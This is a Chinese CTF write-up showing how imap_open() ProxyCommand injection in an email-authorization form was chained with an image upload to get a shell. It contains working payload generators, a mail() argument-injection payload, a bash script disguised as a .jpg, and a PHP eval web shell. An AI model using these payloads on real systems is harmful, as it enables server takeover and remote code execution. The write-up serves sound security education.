从一道题看imap_open() RCE

 

前言

本题为2019安恒2月月赛的my email,从漏洞点发现到getshell还是有点意思的,以下是记录

 

信息搜集

拿到题目先看一遍功能,发现存在注册和登录功能

随便注册个账号,登入,得到信息

发现还有完善信息页面

看样子需要邮箱授权,我们随便测试一下

虽然提示我授权失败,但是来到主页,已经完善信息完成

发现增加功能:更换背景

http://101.71.29.5:10014/user/upload.php

发现是文件上传功能

我们测试一下,随意上传一个图片,查看一下源代码,发现

body{
    background-image: url(./user/skysky.jpg);
    background-size: 100%,100%;
    width: 100%;
    height: 100%;
}

得到上传路径与命名规则

$dir = './user/'.$username.'.jpg';

不难发现,最后保存路径存在可控点$username,我们进行二次注入探测

注册用户

skysky.php%00

登入后发现用户名变为

skysky.php

猜测应该注册处存在

addslashes($username)

那么应该很难使用$username去上传shell

 

攻击点思考

目前来看,情况僵硬,必须思考一下如何串联上述功能进行攻击了

既然不是直接upload+register进行getshell,那么势必需要用到邮件功能

不妨google一下

php+mail+rce

发现如下两个函数

PHP mail()
PHP imap_open()

为进一步确定方向和攻击点,我们看一下邮箱处需要的参数

我们再看上述3种和邮件有关的RCE

首先是

PHP mail()

我们知道其参数为

bool mail(
    string $to,
    string $subject,
    string $message [,
    string $additional_headers [,
    string $additional_parameters ]]
)

这里的界面应该类似于写邮件,例如

而漏洞点即在于mail函数的第五个参数没有正确过滤,我们可以通过如下方式进行RCE

email=
-sky@skysec.top -OqueueDirectory=/ -Xskyskysky.php
title=
<?php eval($_GET[sky]);?>

而这里我们的参数为

email,sign,server

功能为邮箱授权,感觉有些对不上号,我们再看看imap_open()

imap_open ( string $mailbox , string $username , string $password [, int $options = 0 [, int $n_retries = 0 [, array $params = NULL ]]] ) : resource

漏洞点在于第一个参数$mailbox
详细解析可见

https://lab.wallarm.com/rce-in-php-or-how-to-bypass-disable-functions-in-php-installations-6ccdbf4f52bb

 

imap_open()攻击测试

于是综上所述,我们将目光放在imap_open()上开始测试,我们可利用如下脚本生成payload

<?php
$payload = $argv[1];
$encoded_payload = base64_encode($payload);
$server = “any -o ProxyCommand=echot”.$encoded_payload.”|base64t-d|bash}”;
print(“payload: {$server}”.PHP_EOL);

例如

any -o ProxyCommand=echotbHM=|base64t-d|bash}

我们测试一下,由于imap_open是php的扩展模块,我们这里选择找个docker测试

随便搜一个

docker search imap

选择一个后pull

docker pull fedosov/docker-php-imap-composer

进入容器进行测试

docker run -itd fedosov/docker-php-imap-composer /bin/bash
docker attach id

先写一个带有imap_open的1.php

<?php
$payload = "echo skysky|tee /tmp/success";
$encoded_payload = base64_encode($payload);
$server = "any -o ProxyCommand=echot".$encoded_payload."|base64t-d|bash";
@imap_open('{'.$server.'}:143/imap}INBOX', '', '');

我们可以明显看到,运行前tmp目录为空目录,运行后,tmp目录生成了success文件,文件内容为我们指定的skysky

这样一来攻击点就清晰了:利用邮箱授权功能往./user/目录写入shell即可

注:为什么不执行命令呢?因为这里命令不回显……写shell的话要方便很多

 

题目攻击点测试

生成payload脚本为

<?php
$payload = "echo '<?php phpinfo();' > /var/www/html/user/sky.php";
$encoded_payload = base64_encode($payload);
$server = "any -o ProxyCommand=echot".$encoded_payload."|base64t-d|bash";
echo $server;

得到

any -o ProxyCommand=echotZWNobyAnPD9waHAgcGhwaW5mbygpOycgPiAvdmFyL3d3dy9odG1sL3VzZXIvc2t5LnBocA==|base64t-d|bash

我们测试一下

发现参数不被允许提醒,此时猜测是不是存在过滤,我们测试一下

发现

base64,|,

均被过滤,那么既然如此,该如何进行任意文件写入呢?

 

upload助攻

此时不难想起,之前还有一个上传功能,路径如下

$dir = './user/'.$username.'.jpg';

我们是已知文件名和路径的,那么能否在文件内容做文章,进行运用?

这里不难想到,可以直接使用bash filename

例如

那么我们只需要构造文件

echo 'echo "<?php phpinfo();"> skysky.php' > skysky.jpg

然后上传skysky.jpg,再利用imap_open() RCE即可

any -o ProxyCommand=bash skysky.jpg}

我们测试一下

发现成功执行phpinfo()

 

getflag

那么故技重施,即可getshell

echo 'echo "<?php eval($_REQUEST[sky]);"> skysky.php' > skysky.jpg
any -o ProxyCommand=bash skysky.jpg}

菜刀连上,即可getshell

 

后记

这道题目再一次说明了思路很重要,如果思路不明确,尝试注入,upload等则很容易被这道题目带入误区XD

(完)